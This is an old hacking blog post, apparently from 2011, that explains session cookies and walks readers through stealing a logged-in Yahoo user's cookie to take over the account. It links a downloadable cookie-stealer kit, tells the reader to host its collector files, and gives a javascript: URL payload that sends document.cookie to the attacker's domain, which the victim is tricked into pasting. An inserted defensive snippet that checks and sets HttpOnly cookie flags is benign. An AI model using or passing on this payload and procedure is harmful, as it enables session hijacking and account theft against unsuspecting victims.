SYSTEM&WEB HACKING: Cookie stealing: Hacking IDs without Passwords

Friday, August 19, 2011

Cookie stealing: Hacking IDs without Passwords

The concept:
Whenever you log into your account (say, Yahoo, for example), a small piece of random code called a cookie is generated.
One copy of this cookie is stored on your system and the other goes to the server.
This cookie is used for authentication: for as long as you are logged into your account, this piece of code is verified with the server whenever you perform some action. This helps in authentication between you and the server.

Example: Just go to a Yahoo login page and enter this code in place of the URL:

**javascript:alert(document.cookie);**

You will see a small random string. Now log into the Yahoo account with the ID and the password and put the same code in the URL again; you will find a bigger string.
That is nothing but the cookie for that particular session.
But remember that the cookie is destroyed as soon as you log out.
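
The `document.cookie` check above only shows cookies that the server issued without the `HttpOnly` attribute, and the same limit applies to any script that reads `document.cookie`. As an added example (not from the original post), this JavaScript audits constructed `Set-Cookie` headers for script-readable cookies and re-issues the session cookie with `HttpOnly`, `Secure` and `SameSite`; the cookie names, values and the `example.test` domain are assumptions.

```javascript
// Added example, not from the original post. All header values are constructed.
// A cookie shows up in document.cookie unless its Set-Cookie line carries HttpOnly.

// Parse one Set-Cookie header value into { name, value, attrs }.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim()).filter(Boolean);
  const eq = pair.indexOf('=');
  const attrs = {};
  for (const item of rest) {
    const i = item.indexOf('=');
    const key = (i === -1 ? item : item.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : item.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// Names of the cookies a script on the page could read via document.cookie.
function scriptReadable(headers) {
  return headers.map(parseSetCookie).filter((c) => !c.attrs.httponly).map((c) => c.name);
}

// Re-emit a session cookie so it is hidden from page script (HttpOnly),
// never sent over plain HTTP (Secure) and withheld cross-site (SameSite).
function hardenSessionCookie(header) {
  const c = parseSetCookie(header);
  const out = [`${c.name}=${c.value}`];
  for (const [k, v] of Object.entries(c.attrs)) {
    if (['httponly', 'secure', 'samesite'].includes(k)) continue;
    out.push(v === true ? k : `${k}=${v}`); // attribute names are case-insensitive
  }
  const sameSite = typeof c.attrs.samesite === 'string' ? c.attrs.samesite : 'Lax';
  out.push('HttpOnly', 'Secure', `SameSite=${sameSite}`);
  return out.join('; ');
}

// Constructed responses: a pre-login cookie and a post-login session cookie.
const responseHeaders = [
  'B=8f3k2a; Path=/; Domain=.example.test',
  'SESSION=Zm9vYmFy; Path=/; Domain=.example.test',
];

console.log(scriptReadable(responseHeaders)); // both cookies are script-readable
const fixed = [responseHeaders[0], hardenSessionCookie(responseHeaders[1])];
console.log(fixed[1]);
console.log(scriptReadable(fixed)); // the session cookie is no longer listed
```

Running `scriptReadable` over the `Set-Cookie` headers of a login response shows which cookies would appear in the `alert(document.cookie)` output; a session cookie in that list is the one to fix first.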

Performing the hack:

Step 1: Download this file:
http://www.ziddu.com/download/16071128/cookiestealer.rar.html


Step 2: Now register with a web hosting site. Go to the file manager, upload the 4 files (other than the readme), and make another directory called cookies.

Step 3: Give this code to the victim while he is logged in and ask him to paste it into the URL.

*******
javascript:document.location
='http://yourdomain.com/yahoo.php?ex='.concat
(escape(document.cookie));
*******

Step 4: Now, after performing the hack, just open hacked.php. xD xD
